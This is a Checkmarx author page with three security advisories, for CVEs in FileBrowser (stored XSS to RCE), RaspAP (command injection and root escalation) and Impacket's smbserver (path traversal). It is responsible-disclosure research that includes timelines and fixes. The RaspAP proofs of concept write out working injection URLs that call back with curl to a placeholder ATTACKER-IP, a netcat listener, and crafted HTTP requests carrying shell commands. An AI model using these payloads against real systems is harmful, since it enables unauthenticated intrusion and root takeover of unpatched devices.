Omri Inbar, Author at Checkmarx

CVE-2021-37794: XSS to One-Click RCE in FileBrowser

Omri Inbar — Thu, 23 Sep 2021 19:52:33 +0000

According to its official documentation, “FileBrowser” is an open source file managing interface within a specified directory that can be used to upload, delete, preview, rename, and edit your files. It allows the creation of multiple users, and each user can have its own directory. It can be used as a standalone app or as a middleware.

After investigating FileBrowser, the Checkmarx Security Research Team discovered a stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to achieve Remote Code Execution (RCE) on the running FileBrowser instance, as shown in this blog. This vulnerability was assigned CVE-2021-37794.

CVSS Score

9.0 (Critical)

CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Impact Summary

If the vulnerability is exploited, an attacker can run arbitrary operating system (OS) commands on the server that is running the application. As will be shown below, an attacker can achieve this with low-privileged credentials.

Description

A stored Cross Site Scripting (XSS) vulnerability in FileBrowser allows an authenticated user to become authorized to upload a malicious .svg file which acts as a stored XSS payload. FileBrowser includes a command runner feature which enables administrators to execute any shell command they want before or after a certain event. Using this feature, if the XSS payload is triggered by an administrator, it could trigger malicious OS commands on the server running the FileBrowser instance.

Proof-of-Concept

As a user with upload privileges, upload an SVG file containing a malicious script, such as the following:

2. This .svg will run javascript code that will:

a) upload a new Global Setting configuration with the “before_upload” parameter set to “touch /tmp/rce.txt”

b) upload a file with a random filename to trigger the command that would trigger on the “before_upload” event

3. Open the Development tools in the browser, and copy the following URL:

http://filebrowser-ip:8080/api/preview/thumb/exploit.svg?auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjp7ImlkIjoyLCJsb2NhbGUiOiJlbiIsInZpZXdNb2RlIjoibW9zYWljIiwic2luZ2xlQ2xpY2siOmZhbHNlLCJwZXJtIjp7ImFkbWluIjpmYWxzZSwiZXhlY3V0ZSI6dHJ1ZSwiY3JlYXRlIjp0cnVlLCJyZW5hbWUiOnRydWUsIm1vZGlmeSI6dHJ1ZSwiZGVsZXRlIjp0cnVlLCJzaGFyZSI6dHJ1ZSwiZG93bmxvYWQiOnRydWV9LCJjb21tYW5kcyI6W10sImxvY2tQYXNzd29yZCI6ZmFsc2UsImhpZGVEb3RmaWxlcyI6ZmFsc2V9LCJleHAiOjE2MjM0NTU0MDIsImlhdCI6MTYyMzQ0ODIwMiwiaXNzIjoiRmlsZSBCcm93c2VyIn0.8zKdkS5JeHdkPpA-Hrrv-hoGzC247hmxzMiDKci_eAA&inline=true&k=1623448194873

Note: The URL above is the XSS Payload

4. If an admin of the FileBrowser instance attempts to access the above link, or the file itself, the XSS will trigger and run the OS command. This will trigger the payload, and the file rce.txt will be written to /tmp:

Recommendations

This Vulnerability was mitigated by a CSP (Content-Security-Policy) header as can be seen in this commit:

To avoid this issue, update FileBrowser to version v2.16.0 or higher.

Timeline of Disclosure

July 7, 2021 – Disclosure
July 8, 2021 – Issue acknowledged by FileBrowser
July 26, 2021 – Fix committed
July 26, 2021 – Fixed version released
September 1, 2021 – CVE-2021-37794 assigned
September 23, 2021 – Public disclosure

Summary of Disclosure and Events

As can be seen in the Timeline of Disclosure, it only took about 2 weeks from disclosure to fix. We would like to thank FileBrowser (and specifically Oleg Lobanov) for their fast response and speedy fix of the vulnerability.

Final Words

While XSS continues to be on the OWASP Top 10 Web Application Security Risks year after year, and is considered by some to be an insignificant vulnerability, it is still one of the most common vulnerabilities that are found in the wild. In many cases (such as the one seen here), it can lead to more severe exploitations—from access to sensitive files to complete takeover of a victim’s machine.

As always, the best solution is to never trust input that you do not have control over, and to always sanitize input before processing it. In this case, there is also the matter of handling served content types. Because this application serves uploaded files, they should be served in a way that does cause a browser to process them. In this case, serving SVG files which may have malicious contents should be avoided, and any types that may be triggered in a browser (e.g., HTML, SVG) should be served in their text form instead.

Chained RaspAP Vulnerabilities Grant Root Level Access

Omri Inbar — Thu, 29 Jul 2021 17:35:00 +0000

According to its official documentation, “RaspAP” is a wireless router software for many popular Debian-based devices, including the Raspberry Pi. It has a mobile-ready interface that gives the user control over the relevant services and networking options which include advanced DHCP settings, WireGuard and OpenVPN support, SSL certificates, security audits, captive portal integration, and more.

After researching RaspAP, the Checkmarx Security Research Team has found multiple vulnerabilities including OS Command Injection vulnerabilities (CWE-78) that could lead to Remote Code Execution (RCE), as well as a Privilege Escalation vulnerability that could allow an attacker to elevate themselves to root access.

Impact Summary

Using a combination of several of the discovered vulnerabilities, an attacker could execute arbitrary operating system commands with root privileges on any host running the RaspAP software. As will be shown below, an attacker can achieve this with or without credentials.

CVE-2021-33357 Unauthenticated Command Injection

CVSS Score 10.0 (Critical) CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Description

A Command Injection vulnerability exists in “RaspAP” in the “iface” GET parameter in /ajax/networking/get_netcfg.php, when the “iface” parameter value contains special characters such as “;”. Note that while most endpoints on the application require a CSRF token, this endpoint does not. Since no other authentication mechanisms are securing this endpoint, the exploitation does not require any authentication whatsoever and can be triggered directly or via CSRF.

Vulnerability Analysis

As can be seen in a CxSAST scan result, the tainted flow in code is quite clear:

Request matches /ajax/networking/get_netcfg.php with $_GET[‘iface’] parameter and loads into the $interface variable – https://github.com/RaspAP/raspap-webgui/blob/8f0ae3b36aa1020d21477e66010c6b2146e7c222/ajax/networking/get_netcfg.php#L6
The $interface variable is concatenated to the following command and executed:
- exec(‘cat ‘. RASPI_DNSMASQ_PREFIX.$interface.’.conf’, $return);
- https://github.com/RaspAP/raspap-webgui/blob/8f0ae3b36aa1020d21477e66010c6b2146e7c222/ajax/networking/get_netcfg.php#L10

The endpoint /ajax/networking/get_netcfg.php does require the /includes/csrf.php page, which is supposed to ensure only authenticated users can perform meaningful actions, but upon inspection, we see:

In /includes/csrf.php there is a call to csrfValidateRequest in /includes/functions.php – https://github.com/RaspAP/raspap-webgui/blob/8f0ae3b36aa1020d21477e66010c6b2146e7c222/includes/csrf.php#L6
In includes/functions.php the function csrfValidateRequest only handles “POST”, “PUT”, “PATCH” and “DELETE” requests (whereas our endpoint handles the “GET” parameter $_GET[‘iface’])
- https://github.com/RaspAP/raspap-webgui/blob/061d01cbd56411adbe52a313ff8d04e2bfa893bc/includes/functions.php#L286

Proof-of-Concept

Create a basic RaspAP instance by following the guide here.
On the attacker machine, open a socket listener:
- nc -nvlp 4444
Browse to:

http://raspap-ip/ajax/networking/get_netcfg.php?iface=;curl%20http://ATTACKER-IP:4444/`whoami`;

As we can see, the attacker has received a request from the victim requesting the page “www-data”, which is the username of the user running the webserver.

CVE-2021-33356 Privilege Escalation

CVSS Score 9.9 (Critical) CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Description

The application runs multiple OS commands with sudo. To be able to do so, it adds permissions to run OS commands with sudo without a password during the installation.

The list of available commands is on the picture:

Whereas some of these files are owned by root, some files in the /etc/raspap folder are owned by the www-data user or group, which gives write permissions to these files. If an attacker can run OS commands as www-data, then they can modify one of the files and add arbitrary bash commands. Afterward, they can run the modified file with root privileges using sudo.

By chaining the unauthenticated OS command injection vulnerability mentioned in this report it’s possible to run OS commands as root without authentication.

Proof-of-Concept

1. Create basic RaspAP instance by following the guide here.

2. On the attacker machine, open a socket listener:

nc -nvlp 4444

3. Browse to: http://raspaddress/ajax/networking/get_netcfg.php?iface=;echo%20%22curl%20http://ATTACKERIP:PORT/`whoami`%22%20%3E%3E%20/etc/raspap/lighttpd/configport.sh%20;sudo%20/etc/raspap/lighttpd/configport.sh%2080%20127.0.0.1%20/etc/lighttpd/lighttpd.conf%20localhost

This time the requested page “root” shows us the command was run with root privileges.

CVE-2021-33358 Authenticated Command Injection

CVSS Score 9.9 (Critical) CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Description

RaspAP allows creating an Access Point (AP) with the defined settings. After the settings are saved, it provides the user with a QR code that contains the SSID and password of the AP created by the application. This feature is available after authentication.

An authenticated attacker can send a POST request with a malicious payload in the “interface”, “ssid”, or “wpa_passphrase” field to run arbitrary OS commands. The command injected into the “interface” field is executed immediately. The commands injected into SSID and password fields require an additional request to the QR-code generation page to be triggered.

Vulnerability Analysis

The QR code is built in https://github.com/RaspAP/raspap-webgui/blob/master/app/img/wifi-qr-code.php file. It takes ssid and password from hostapd config file (https://github.com/RaspAP/raspap-webgui/blob/8f0ae3b36aa1020d21477e66010c6b2146e7c222/app/img/wifi-qr-code.php#L18).
The SSID and password are processed through qr_encode function that replaces part of the characters (https://github.com/RaspAP/raspap-webgui/blob/8f0ae3b36aa1020d21477e66010c6b2146e7c222/app/img/wifi-qr-code.php#L15), but it leaves $, (, ) and /.
Later (https://github.com/RaspAP/raspap-webgui/blob/8f0ae3b36aa1020d21477e66010c6b2146e7c222/app/img/wifi-qr-code.php#L44) while building the OS command, the concatenated data is processed with mb_escapeshellarg function, which only escapes quotes (https://github.com/RaspAP/raspap-webgui/blob/e3c00a80920ae2dea516ebdd3921335eb51231f6/includes/functions.php#L523). Therefore, setting the password equal to $(touch /tmp/123) allows running an OS command.
The “interface” parameter value is directly inserted into a system command without sanitization after the HTTP request that updated the AP configuration (https://github.com/RaspAP/raspap-webgui/blob/6d3966dd8a54dad2b85b39f2ab0fa476143f2059/includes/hostapd.php#L64)

To reproduce the vulnerability, open the security settings of the hotspot, as shown in the picture above, and insert the OS command into the password field in the following format: $(OS COMMAND). Note that some of the symbols are filtered, but this can be bypassed by using the base64 encoded OS command.

Proof-of-Concept

Create a basic RaspAP instance by following the guide here.
After authenticating, send the following HTTP requests to the RaspAP host:
1. POST /hostapd_conf HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 355
  Origin: http://localhost
  Authorization: Basic YWRtaW46c2VjcmV0
  Connection: close
  Referer: http://localhost/hostapd_conf
  Cookie: PHPSESSID=j99hb7n50dp4d26no5ccnjhf2o
  Upgrade-Insecure-Requests: 1
  
  csrf_token=ce138993d5ecd5d041fb805425ab069d700251a1be50e2ade5d51c5fa084f282&interface=lo;touch%20/tmp/checkinterface;&ssid=%24%28touch+%2Ftmp%2Fcheckssid%29&hw_mode=g&channel=1&wpa=2&wpa_pairwise=CCMP&wpa_passphrase=%24%28touch+%2Ftmp%2Fcheckpass%29&beaconintervalEnable=1&beacon_interval=100&max_num_sta=&country_code=AF&SaveHostAPDSettings=Save+settings
2. GET /app/img/wifi-qr-code.php HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
  Accept: image/webp,*/*
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Authorization: Basic YWRtaW46c2VjcmV0
  Connection: close
  Referer: http://localhost/hostapd_conf
  Cookie: PHPSESSID=j99hb7n50dp4d26no5ccnjhf2o
On the victim machine, we see all 3 files were created:

Recommendations

The developer released a fix. To avoid these issues, update RaspAP to version 2.6.6 or higher.

Timeline of Disclosure

Apr 21, 2021 – Disclosure
Apr 21, 2021 – Issue acknowledged by RaspAP
May 2, 2021 – Fix committed
June 10, 2021 – CVE-2021-33356, CVE-2021-33357, and CVE-2021-33358 assigned
June 6, 2021 – Fixed version released
July 28, 2021 – Public disclosure

Final Words

This type of research is part of the Checkmarx Security Research Team’s ongoing efforts to drive the necessary changes in software security practices among all organizations. Checkmarx is committed to analyzing open-source software to help development teams build and deploy more secure applications. Our database of open source libraries and vulnerabilities is cultivated by the Checkmarx Security Research Team, empowering CxSCA customers with risk details, remediation guidance, and exclusive vulnerabilities that go beyond the NVD.

Copyright Notices

RaspAP/raspap-webgui is licensed under the GNU General Public License v3.0
Copyright (C) 2007 Free Software Foundation, Inc. . Everyone is permitted to copy and distribute verbatim copies of this licensed document, but changing it is not allowed.

CVE-2021-31800: How We Used Impacket to Hack Itself

Omri Inbar — Wed, 16 Jun 2021 04:31:57 +0000

According to its official documentation, Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets for some protocols (e.g. SMB1-3 and MSRPC), and for others, the protocol implementation itself.
After investigating Impacket, the Checkmarx Security Research Team discovered a Path Traversal vulnerability, which could allow an attacker to write malicious files to any path on the target and achieve Remote Code Execution (RCE). This vulnerability, assigned CVE-2021-31800, was found not only in the Impacket library, but also in other tools that implement the vulnerable code such as CrackMapExec and “Honeypots.”

CVSS Score

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CVS Score: 9.9 (Critical)

Impact Summary

If the vulnerability is exploited, an attacker could write files to any location on the affected computer. This could be elevated to an RCE in a variety of ways depending on the environment and the operating system. This will be demonstrated later in this write-up.

Description

Impacket’s smbserver is vulnerable to Path Traversal Attacks. An attacker that connects to a running smbserver instance can list and write arbitrary files to any location on the attacked host (not just the chosen workdir for the server).
The reason for that is that while there is validation against relative paths in filenames in smbclient (and of course Windows Client), the Impacket SMB server implementation, smbserver does not validate it, which allows an attacker with an edited version of smbclient to exploit anyone who deploys an instance of smbserver.

Vulnerability Analysis

The following 2 lines take the filename path from the received SMB request and try to list its directory without making sure that the path is inside the intended working directory. This could enable an attacker to read the contents of the file system:

The following 2 lines take the filename path and contents from the received SMB request and try write the contents to the received path without making sure that the path is inside the intended working directory. This could enable an attacker to arbitrarily write files:

Proof-of-Concept

To exploit this vulnerability, we have edited Impacket’s own smbclient.py to exploit its server implementation with 2 extra functions: do_ls_exploit and do_put_exploit. The functions do the exact same thing as do_ls and do_put (which is list directory and put file), only they do not sanitize the file paths on the client.
Since this is not enforced on the server, when combined with a path containing Path Traversal strings (../), these customized functions allow an attacker to read directories and write files anywhere on the file system.
Below are the differences between the two smbclient functions and their original counterparts:

Below is a Proof-of-Concept flow of the attack:

Creating a file for injection, connecting to a running smbserver instance (run locally for demonstration purposes) using the edited smbclient.py script and connecting to WORKDIR

Listing the directory contents (empty directory)

Listing /tmp using Path Traversal exploit

Injecting poc.txt and confirming using the exploit again.

CrackMapExec

Another tool that we found containing the same vulnerability is CrackMapExec. CrackMapExec (or CME for short) is a post-exploitation tool used primarily for offensive purposes and is heavily based on the Impacket library. We have found three attack modules that use the vulnerable smbserver which are: netripper, get_timedscreenshot and get_keystrokes. When an attacker attacks a victim with one of these modules, CME opens an smbserver instance in order to collect the results. As we’ve seen before, this could be exploited by a third party.

Proof-of-Concept

Exploitation of the get_timedscreenshot module of CrackMapExec using an injected PHP Webshell in /var/www/html.

cme

Honeypots and Chameleon

Finally, we found two honeypot-based tools (used for creating intentionally vulnerable environments that act as tripwires for incoming attacks) called “honeypots” and “Chameleon,” which again contain the same vulnerability. “Honeypots” is a python library which contains 16 different honeypots (including Impacket’s smbserver) in a single PyPI package for monitoring network traffic.
Chameleon is a project from the same creators which features a GUI for handling multiple honeypots (imported from the “honeypots” library), which again contains the same vulnerability.

Proof-of-Concept

Exploitation of the “honeypots” smbserver using an injected SSH Key.

honeypots

Recommendations

To avoid issues like this, update the Impacket package to the latest version.

Summary of Disclosure and Events

After notifying SecureAuthCorp, they informed us that they were aware that there might be possible vulnerabilities in the implementation, as can be seen by this 10 year old comment. Nevertheless, they did acknowledge the vulnerability and promptly accepted our fix. We would like to thank SecureAuthCorp for their fast response and continuous contribution to the security and research community.

Timeline of Disclosure

Apr 20, 2021 – Disclosure
Apr 20, 2021 – Issue acknowledged by SecureAuthCorp
Apr 26, 2021 – Fix committed
Apr 26, 2021 – CVE-2021-31800 assigned
May 3, 2021 – Fixed version released
June 16, 2021 – Public disclosure

Final Words

The research and resulting findings with Impacket serve as a valuable reminder that almost any piece of code that could be deployed in an organization must be tested regularly and made compliant, even if it does something as benign as serve some files via an SMB share. In this case, multiple tools that can be deployed by security experts in the company, either for testing or entrapment (honeypots), would actually be leaving themselves vulnerable.
Impacket is very popular amongst security professionals, and so are the derivatives uses of the vulnerable code within it. The Checkmarx Security Research Team is dedicated to performing investigations of this nature to better improve the security posture of tools and organizations more broadly.

Copyright Notices

Impacket

CrackMapExec

Copyright (c) 2020, byt3bl33d3r All rights reserved.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS “AS IS” AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.